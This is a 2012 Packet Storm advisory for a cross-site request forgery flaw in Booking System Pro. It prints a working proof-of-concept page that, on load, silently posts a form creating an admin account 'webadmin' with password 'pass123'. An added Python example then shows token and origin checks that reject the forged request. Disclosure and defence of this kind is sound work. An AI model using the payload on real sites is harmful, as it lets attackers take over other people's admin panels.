Booking System Pro Cross Site Request Forgery

2012-08-30T00:00:00
ID PACKETSTORM:116095
Type packetstorm
Reporter DaOne
Modified 2012-08-30T00:00:00

Description

                                        
`# Exploit Title: Booking System Pro CSRF Vulnerability  
# Date: 28/08/2012  
# Author: DaOne (@LibyanCA)  
# Vendor: http://www.neptunescripts.com/products  
# Price: $39  
  
  
# CSRF Add Admin  
  
<html>  
<body onload="document.form0.submit();">  
<form method="POST" name="form0" action="http://[target]/admin/users/add">  
<input type="hidden" name="data[User][name]" value="webadmin"/>  
<input type="hidden" name="data[User][username]" value="webadmin">  
<input type="hidden" name="data[User][password]" value="pass123">  
<input type="hidden" name="data[User][email]" value="admin@email.com">  
<input type="hidden" name="data[User][phone]" value=""/>  
<input type="hidden" name="data[User][role]" value="admin"/>  
</form>  
</body>  
</html>  
  
`
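
The forged form above contains only predictable field values and no per-session token, so the server cannot tell it from a request made in the admin panel. A server-side check that rejects it, as an added example (not code from the advisory or the vendor); `TRUSTED_ORIGIN`, the `csrf_token` field name and the session dict are assumptions:

```python
import hmac
import secrets
from urllib.parse import urlsplit

# Assumptions (not from the advisory): the site's own origin and the name of
# the hidden token field are hypothetical.
TRUSTED_ORIGIN = "https://booking.example"
TOKEN_FIELD = "csrf_token"
STATE_CHANGING = {"POST", "PUT", "PATCH", "DELETE"}


def new_csrf_token():
    """Random per-session token, kept server-side and echoed in each admin form."""
    return secrets.token_urlsafe(32)


def same_origin(headers):
    """Compare Origin (or Referer as fallback) with the site's own origin."""
    source = headers.get("Origin") or headers.get("Referer")
    if not source:
        return False  # neither header present: fail closed
    parts = urlsplit(source)
    return f"{parts.scheme}://{parts.netloc}" == TRUSTED_ORIGIN


def check_request(method, headers, form, session):
    """Return (allowed, reason) for a request to an admin action."""
    if method.upper() not in STATE_CHANGING:
        return True, "safe method"
    if not same_origin(headers):
        return False, "cross-origin or missing Origin/Referer"
    expected = session.get("csrf_token", "")
    supplied = form.get(TOKEN_FIELD, "")
    # Constant-time comparison; an empty expected token never matches.
    if not expected or not hmac.compare_digest(expected.encode(), supplied.encode()):
        return False, "missing or wrong CSRF token"
    return True, "ok"


# Constructed sample: fields the auto-submitting form in the advisory sends.
FORGED_FORM = {
    "data[User][username]": "webadmin",
    "data[User][password]": "pass123",
    "data[User][role]": "admin",
}

if __name__ == "__main__":
    session = {"csrf_token": new_csrf_token()}
    print(check_request("POST", {"Origin": "https://attacker.example"}, FORGED_FORM, session))
    print(check_request("POST", {"Origin": TRUSTED_ORIGIN}, FORGED_FORM, session))
```
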